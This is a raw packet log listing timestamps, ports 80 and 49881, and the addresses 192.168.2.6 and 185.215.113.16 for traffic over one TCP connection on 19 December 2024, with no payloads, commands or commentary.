Dec 19, 2024 10:10:22.329207897 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.329253912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.329895020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.329950094 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.330432892 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.330477953 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.330746889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.330792904 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.331305981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.331353903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.331748009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.331790924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.332191944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.332237959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.332688093 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.332731009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.332757950 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.332803011 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.333226919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.333271980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.333378077 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.333424091 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.334069014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.334111929 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.334122896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.334166050 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.334888935 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.334933043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.335367918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.335412025 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.335707903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.335752010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.336235046 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.336283922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.336483002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.336499929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.336528063 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.336554050 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.337235928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.337296009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.337896109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.337954998 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.338180065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.338228941 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.338365078 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.338413000 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.339113951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.339171886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.339374065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.339421034 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.339854002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.339899063 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.340456963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.340501070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.340703964 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.340747118 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.340941906 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.340986967 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.341566086 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.341613054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.342222929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.342267990 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.342415094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.342432976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.342458963 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.342473030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.343363047 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.343380928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.343406916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.343432903 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.344034910 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.344079971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.344219923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.344265938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.344989061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.345035076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.345489025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.345534086 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.346138000 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.346175909 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.491090059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.491239071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.491302967 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.491333961 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.491369963 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.491369963 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.491413116 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.492196083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.492362022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.492666006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.492832899 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.493041992 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.493829966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.493889093 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.493983030 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.493999958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.494046926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.494915009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.495758057 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.495774984 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.495805979 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.495820999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.495918989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.496720076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.496736050 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.496766090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.496790886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.497644901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.497828960 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.497874022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.498455048 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.498471975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.498526096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.499284983 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.499325991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.500211000 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.500227928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.500272989 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.500288963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.501075029 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.501122952 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.501466036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.502002001 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.502052069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.502871990 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.502888918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.502916098 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.502942085 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.502958059 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.503002882 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.503726006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.503861904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.503911972 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.504648924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.505511999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.505559921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.505580902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.505599022 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.505625010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.505656004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.506381989 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.507074118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.507122993 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.507335901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.507401943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.507451057 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.508217096 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.508259058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.508300066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.508344889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.509108067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.509466887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.509515047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.509958029 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.510102034 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.510149956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.510832071 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.510876894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.511059999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.511781931 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.511831999 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.511913061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.511991978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.512720108 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.513190985 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.513237953 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.513571978 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.513587952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.513642073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.514410019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.514453888 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.514571905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.515510082 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.515557051 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.515639067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.516534090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.516580105 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.516833067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.516876936 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.517600060 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.517971039 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.517982006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.518024921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.518729925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.519265890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.519309998 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.519438028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.519468069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.519515991 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.520247936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.520291090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.520663977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.520973921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.521130085 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.521174908 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.521639109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.521683931 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.521855116 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.521898985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.522313118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.522358894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.522555113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.522572041 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.522598982 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.522613049 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.523703098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.523750067 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.523878098 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.523921013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.524295092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.524312973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.524358988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.525170088 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.525348902 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.525396109 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.526102066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.526145935 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.527091026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.527108908 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.527127981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.527153015 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.527179956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.527801991 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.528031111 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.528078079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.528666973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.529244900 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.529293060 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.529656887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.529674053 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.529700994 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.529732943 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.530622005 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.531100988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.531151056 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.531400919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.531541109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.531594992 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.532253027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.532296896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.532390118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.532977104 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.533139944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.533834934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.533879995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.534095049 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.534111977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.534156084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.534904957 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.534950018 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.534991026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.536000013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.536077023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.536092997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.536119938 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.536134005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.537045956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.537091017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.537153959 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.537784100 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.537837029 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.683244944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.683269024 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.683288097 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.683351040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.683352947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.683394909 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.683394909 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.684262037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.684561968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.684622049 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.685014963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.685134888 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.685178995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.685933113 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.685951948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.686075926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.686824083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.687383890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.687433004 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.687702894 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.687721968 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.687771082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.688561916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.689492941 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.689511061 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.689528942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.689542055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.689553022 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.689577103 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.690363884 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.690612078 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.690655947 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.691216946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.691658974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.691705942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.692107916 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.692151070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.693070889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.693088055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.693105936 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.693134069 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.693150997 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.693937063 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.694025993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.694072008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.694824934 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.694938898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.694984913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.695692062 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.695847988 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.695894003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.696585894 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.696629047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.697376013 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.697591066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.697608948 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.697643042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.697668076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.698519945 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.698571920 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.698626995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.699388981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.699407101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.699450970 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.700202942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.700328112 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.700368881 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.701045036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.701092005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.701421022 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.701951027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.701992035 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.702380896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.702822924 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.702866077 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.702886105 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.702919960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:22.703892946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:22.704024076 CET	80	49881	185.215.113.16	192.168.2.6
